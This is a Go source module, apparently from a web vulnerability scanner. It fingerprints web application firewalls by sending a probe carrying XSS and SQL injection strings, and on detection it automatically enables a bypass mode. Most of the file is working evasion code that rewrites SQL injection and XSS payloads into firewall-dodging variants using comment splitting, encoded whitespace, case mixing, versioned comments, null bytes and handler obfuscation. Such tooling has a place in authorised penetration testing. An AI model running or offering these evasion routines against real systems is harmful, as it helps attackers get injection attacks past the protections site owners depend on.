package modules

import (
	crand "crypto/rand"
	"encoding/binary"
	"fmt"
	"math/rand"
	"net/http"
	"strings"
	"time"

	"github.com/SentinelXofficial/sxel/internal/color"
	"github.com/SentinelXofficial/sxel/pkg/core"
)

var rng = newSeededRand()

func newSeededRand() *rand.Rand {
	var seed int64
	if err := binary.Read(crand.Reader, binary.BigEndian, &seed); err != nil {
		seed = time.Now().UnixNano()
	}
	return rand.New(rand.NewSource(seed))
}

type wafSignature struct {
	Vendor      string
	Headers     map[string]string
	BodyMarkers []string
	StatusCodes []int
}

var wafSignatures = []wafSignature{
	{Vendor: "Cloudflare", Headers: map[string]string{"cf-ray": "", "server": "cloudflare"}, BodyMarkers: []string{"cloudflare", "cf-mitigated", "attention required! | cloudflare"}},
	{Vendor: "Akamai", Headers: map[string]string{"x-check-cacheable": "", "x-akamai-transformed": "", "akamai-origin-hop": ""}, BodyMarkers: []string{"akamai", "reference #", "access denied — akamai"}},
	{Vendor: "AWS WAF / ALB", Headers: map[string]string{"x-amzn-requestid": "", "x-amzn-errortype": "", "x-amz-cf-id": ""}, BodyMarkers: []string{"aws", "request blocked", "<code>accessdenied</code>"}},
	{Vendor: "ModSecurity", Headers: map[string]string{"server": "mod_security"}, BodyMarkers: []string{"mod_security", "modsecurity", "not acceptable!", "406 not acceptable"}},
	{Vendor: "Imperva / Incapsula", Headers: map[string]string{"x-iinfo": "", "incap-ses": ""}, BodyMarkers: []string{"incapsula", "visid_incap_", "_incap_ses_", "blocked by incapsula"}},
	{Vendor: "F5 BIG-IP ASM", Headers: map[string]string{"x-wa-info": "", "bigipserver": ""}, BodyMarkers: []string{"the requested url was rejected", "please consult with your administrator", "your support id is"}},
	{Vendor: "Sucuri", Headers: map[string]string{"x-sucuri-id": "", "x-sucuri-cache": ""}, BodyMarkers: []string{"sucuri website firewall", "sucuri cloudproxy", "sucuri-block"}},
	{Vendor: "Wordfence", Headers: map[string]string{}, BodyMarkers: []string{"wordfence", "generated by wordfence", "blocked because of suspicious activity"}},
	{Vendor: "Barracuda WAF", Headers: map[string]string{"barra_counter_session": ""}, BodyMarkers: []string{"barracuda networks", "barracuda application server"}},
	{Vendor: "Fortinet FortiWeb", Headers: map[string]string{"x-authenticated-user": ""}, BodyMarkers: []string{"fortiweb", "fortigate", "your request is blocked"}},
	{Vendor: "Radware AppWall", Headers: map[string]string{"x-sl-compstate": ""}, BodyMarkers: []string{"radware", "unauthorized activity has been detected"}},
	{Vendor: "Nginx + NAXSI", Headers: map[string]string{"x-data-origin": "naxsi"}, BodyMarkers: []string{"naxsi", "nginx", "418 i'm a teapot"}},
}

type WAFDetectResult struct {
	Detected bool
	Vendor   string
	Evidence string
}

func AutoDetectWAF(client *http.Client, cfg *core.Config, targetURL string) WAFDetectResult {
	sep := "?"
	if strings.Contains(targetURL, "?") {
		sep = "&"
	}
	probeURL := targetURL + sep + "waf_probe=<script>alert(1)</script>&id=1' OR '1'='1"
	req, err := http.NewRequest("GET", probeURL, nil)
	if err != nil {
		return WAFDetectResult{}
	}
	core.ApplyHeaders(req, cfg)
	resp, err := client.Do(req)
	if err != nil {
		return WAFDetectResult{}
	}
	defer resp.Body.Close()
	bodyBytes := core.ReadBody(resp.Body)
	body := strings.ToLower(bodyBytes)
	for _, sig := range wafSignatures {
		for hdr, val := range sig.Headers {
			actual := strings.ToLower(resp.Header.Get(hdr))
			if actual == "" {
				continue
			}
			if val == "" || strings.Contains(actual, strings.ToLower(val)) {
				result := WAFDetectResult{Detected: true, Vendor: sig.Vendor, Evidence: fmt.Sprintf("header %q = %q", hdr, resp.Header.Get(hdr))}
				applyWAFMitigations(cfg, sig.Vendor)
				return result
			}
		}
		for _, marker := range sig.BodyMarkers {
			if strings.Contains(body, strings.ToLower(marker)) {
				result := WAFDetectResult{Detected: true, Vendor: sig.Vendor, Evidence: fmt.Sprintf("body marker %q", marker)}
				applyWAFMitigations(cfg, sig.Vendor)
				return result
			}
		}
	}
	genericCodes := map[int]bool{403: true, 406: true, 412: true, 429: true, 503: true}
	if genericCodes[resp.StatusCode] && strings.Contains(body, "blocked") {
		result := WAFDetectResult{Detected: true, Vendor: "Unknown WAF", Evidence: fmt.Sprintf("HTTP %d + 'blocked' in body", resp.StatusCode)}
		applyWAFMitigations(cfg, "Unknown WAF")
		return result
	}
	return WAFDetectResult{Detected: false}
}

func applyWAFMitigations(cfg *core.Config, vendor string) {
	if !cfg.WAFBypass {
		cfg.WAFBypass = true
		fmt.Printf("%s WAF Detected: %s -- auto-enabling --waf-bypass\n", color.BoldYellow("[~]"), vendor)
	}
	if cfg.Delay < 400 {
		cfg.Delay = 400
		fmt.Printf("%s auto-adjusting delay to %dms\n", color.BoldYellow("[~]"), cfg.Delay)
	}
}

func WAFBypassSQL(payload string) []string {
	out := []string{payload}
	add := func(s string) {
		if s != payload { out = append(out, s) }
	}
	add(randCase(payload))
	add(strings.ReplaceAll(payload, " ", "/**/"))
	add(strings.ReplaceAll(payload, " ", "%09"))
	add(strings.ReplaceAll(payload, " ", "%0a"))
	add(strings.ReplaceAll(payload, " ", "%0d%0a"))
	up := strings.ToUpper(payload)
	for _, kw := range []string{"SELECT", "UNION", "WHERE", "FROM", "AND", "OR", "INSERT", "UPDATE"} {
		if len(kw) <= 2 { continue }
		idx := strings.Index(up, kw)
		if idx < 0 { continue }
		native := payload[idx : idx+len(kw)]
		split := native[:2] + "/**/" + native[2:]
		add(strings.ReplaceAll(payload, native, split))
	}
	if idx := strings.Index(up, "SELECT"); idx >= 0 {
		native := payload[idx : idx+6]
		add(strings.ReplaceAll(payload, native, "/*!50000"+native+"*/"))
	}
	if idx := strings.Index(up, "UNION"); idx >= 0 {
		native := payload[idx : idx+5]
		add(strings.ReplaceAll(payload, native, "UN/**/ION"))
	}
	add(payload + "%00")
	return dedup(out)
}

func WAFBypassXSS(payload string) []string {
	out := []string{payload}
	add := func(s string) {
		if s != payload { out = append(out, s) }
	}
	add(mixTagCase(payload))
	add(strings.ReplaceAll(payload, "<img src=x ", "<img/src=x/"))
	add(strings.ReplaceAll(payload, " onerror=", "/onerror="))
	for _, ev := range []string{"onerror", "onload", "onclick", "onfocus", "ontoggle", "onstart", "onmouseover"} {
		if strings.Contains(payload, ev) {
			add(strings.ReplaceAll(payload, ev, mixStr(ev)))
		}
	}
	add(strings.ReplaceAll(payload, "alert('XSS')", "confirm`XSS`"))
	add(strings.ReplaceAll(payload, "alert(1)", "confirm(1)"))
	add(strings.ReplaceAll(payload, "alert('XSS')", "alert`XSS`"))
	add(strings.ReplaceAll(payload, "\"", "&#34;"))
	add(strings.ReplaceAll(payload, "'XSS'", "`XSS`"))
	return dedup(out)
}

func randCase(s string) string {
	b := []byte(s)
	for i, c := range b {
		if c >= 'a' && c <= 'z' && rng.Intn(2) == 0 { b[i] = c - 32 } else if c >= 'A' && c <= 'Z' && rng.Intn(2) == 0 { b[i] = c + 32 }
	}
	return string(b)
}

func mixTagCase(s string) string {
	r := s
	for _, tag := range []string{"script", "img", "svg", "iframe", "body", "input", "details", "video", "audio", "marquee"} {
		upper := strings.ToUpper(tag[:1]) + tag[1:]
		r = strings.ReplaceAll(r, "<"+tag, "<"+upper)
		r = strings.ReplaceAll(r, "</"+tag, "</"+upper)
	}
	return r
}

func mixStr(s string) string {
	b := []byte(s)
	for i := range b {
		if i%2 == 0 && b[i] >= 'a' && b[i] <= 'z' { b[i] -= 32 }
	}
	return string(b)
}

func dedup(ss []string) []string {
	seen := map[string]bool{}
	var out []string
	for _, s := range ss {
		if !seen[s] { seen[s] = true; out = append(out, s) }
	}
	return out
}
